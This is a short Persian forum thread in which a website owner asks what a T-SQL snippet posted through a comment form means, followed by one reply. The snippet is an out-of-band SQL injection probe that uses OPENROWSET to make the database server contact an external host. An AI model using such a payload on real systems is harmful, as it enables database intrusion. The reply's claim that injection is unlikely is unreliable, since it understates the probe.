0
ارسال کویری از طریق فرم توسط کاربر
سلام.وقت بخیر
کاربر سایتم در بخش نظرات کد زیر رو ارسال کرده .
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','0s7k_ua5-6akuog-rz_peqatnksld0n67iyjg5zs'+'yqa.r87.me')exec sp_executesql @r
میخواستم دقیق بدونم چی هست؟؟؟
1 پاسخ
0
سلام، وقت بخیر
چیز خاصی نمیشه گفت، شاید قصد داشته SQL Injection بزنه که با توجه به کوئری بعید میدونم، اما چیز خاصی نمیشه راجع بش گفت، چون کوئری بر مبنای ساختار یک بانک اطلاعاتی نوشته میشه.